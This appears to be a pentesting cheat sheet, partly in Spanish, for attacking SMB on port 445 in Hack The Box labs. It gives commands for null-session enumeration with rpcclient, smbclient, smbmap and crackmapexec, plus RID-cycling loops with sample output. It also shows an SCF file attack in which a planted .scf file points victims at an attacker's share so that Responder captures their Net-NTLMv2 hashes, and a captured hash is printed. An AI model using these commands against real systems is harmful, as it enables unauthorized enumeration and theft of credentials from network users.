Port 445 - SMB
Test connection
rpcclient -U "" -N <IP> #No creds
rpcclient -U "username%passwd" <IP> #With creds
smbclient --no-pass -L //<IP> # Null user
Enumeration
Basic Info
enum4linux -a <TARGET-IP> [-u "" -p ""]
smbclient --no-pass //<TARGET-IP>/<Folder> # Null session
##### RPCCLIENT #####
# Test Connection
rpcclient -U "" -N <TARGET-IP> # Null session
rpcclient //machine.htb -U domain.local/<USER>%<HASH> --pw-nt-hash
rpcclient -U "<USER>%<PASS>" <TARGET-IP> #With creds
# Domain Info
querydominfo # Description of the domain
enumdomains # List domains in the network
getdompwinfo # Password policy info
# Enum users
enumdomuser # List all users
querydispinfo # Description of users
queryuser <RID> # Description of an user by his rid
queryuser <name> # Description of an user by his name
lsaenumsid # Enum sid's of users
lookupnames <Name> # Enum sid's for an user
getusrdompwinfo <RID> # Password policy of an user
# Enum groups
enumdomgroups # List of groups
querygroup <RID> # Description of the group
querygroupmem <RID> # List rid's of the users in this group
Shared Folders
smbmap -H <TARGET-IP> -u 'asdasd' # Null session
smbmap [-u "username" -p "password"] -R [Folder] -H <TARGET-IP> [-P <PORT>] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H <TARGET-IP> [-P <PORT>] # Non-Recursive list
crackmapexec smb 10.10.10.192 -u 'asdasd' -p '' --shares # Null session
## RPCCLIENT
netshareenum
netshareenumall
netsharegetinfo <SHARE-NAME>
## Download Shared Folders
smbmap -H <TARGET-IP> -u 'username' -p 'password' --download '<Path>' # one file
smbclient //<target-ip>/<shared-foldaer> -N # Null session
smbclient //<target-ip>/<shared-foldaer> -U "<username>%password>"
smb: \> prompt off
smb: \> recurse on
smb: \> mget *
Mount
apt install cifs-utils
mount -t cifs //<ip>/<shared> /mnt/<somefolder> [-o username=<algo>,password=<algo>,domain=,rw]
umount /mnt/<somefolder>
Explotación
Rid Cycling
Este ataque consta de enumerar usuarios con sus RID's y SID's a través de una null session con rpcclient.
rpcclient -U "" -N 10.10.10.129 -c "lsaenumsid" # sin creds
found 6 SIDs
S-1-5-32-550
S-1-5-32-548
S-1-5-32-551
S-1-5-32-549
S-1-5-32-544
for i in $(seq 500 600); do rpcclient -U "" -N 10.10.10.129 -c "lookupsids S-1-5-32-$i" 2>/dev/null; done | grep -viE "unknown"
S-1-5-32-544 BUILTIN\Administrators (4)
S-1-5-32-545 BUILTIN\Users (4)
S-1-5-32-546 BUILTIN\Guests (4)
S-1-5-32-547 BUILTIN\Power Users (4)
...
# A nivel de sistema siempre existe el usuario root por lo que
# podremos listar su sid, y este nos dará otro grupo de sids
# para seguir enumerando usuarios
rpcclient -U "" -N 10.10.10.129 -c "lookupnames root"
root S-1-22-1-0 (User: 1)
for i in $(seq 0 600); do rpcclient -U "" -N 10.10.10.129 -c "lookupsids S-1-22-1-$i" 2>/dev/null; done | grep -viE "unknown"
S-1-22-1-0 Unix User\root (1)
S-1-22-1-1 Unix User\daemon (1)
S-1-22-1-2 Unix User\bin (1)
S-1-22-1-3 Unix User\sys (1)
S-1-22-1-4 Unix User\sync (1)
S-1-22-1-5 Unix User\games (1)
SCF File Attacks
Este ataque consta de si tenemos acceso a una carpeta compartida a nivel de red en la que podemos colocar un archivo con extensión .scf malicioso que nos va a permitir generar una conexión desde la máquina en la que se ejecute dicho archivo automáticamente, proveyéndonos el hash Net-NTLMv2 para su posterior crackeo.
[Shell]
Command=2
IconFile=\\X.X.X.X\share\some.ico
[Taskbar]
Command=ToggleDesktop
Activamos el responder:
responder -I tun0 -dw
[SMB] NTLMv2-SSP Client : 10.10.10.103
[SMB] NTLMv2-SSP Username : HTB\amanda
[SMB] NTLMv2-SSP Hash : amanda::HTB:88f9e2309575569a:083F2CCE110D8865D30D206CA6845E71:01010000000000008053022A2919DA0133742111E113D434000000000200080048004D004B004A0001001E00570049004E002D003100480050004F0030004A005A005100320034005A0004003400570049004E002D003100480050004F0030004A005A005100320034005A002E0048004D004B004A002E004C004F00430041004C000300140048004D004B004A002E004C004F00430041004C000500140048004D004B004A002E004C004F00430041004C00070008008053022A2919DA01060004000200000008003000300000000000000001000000002000005FFA777B02D96CA2EC88A47091BFDF1D2EEC3BE65A5880CE2FE33FC252D6F8680A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E003800000000000000000000000000
Last updated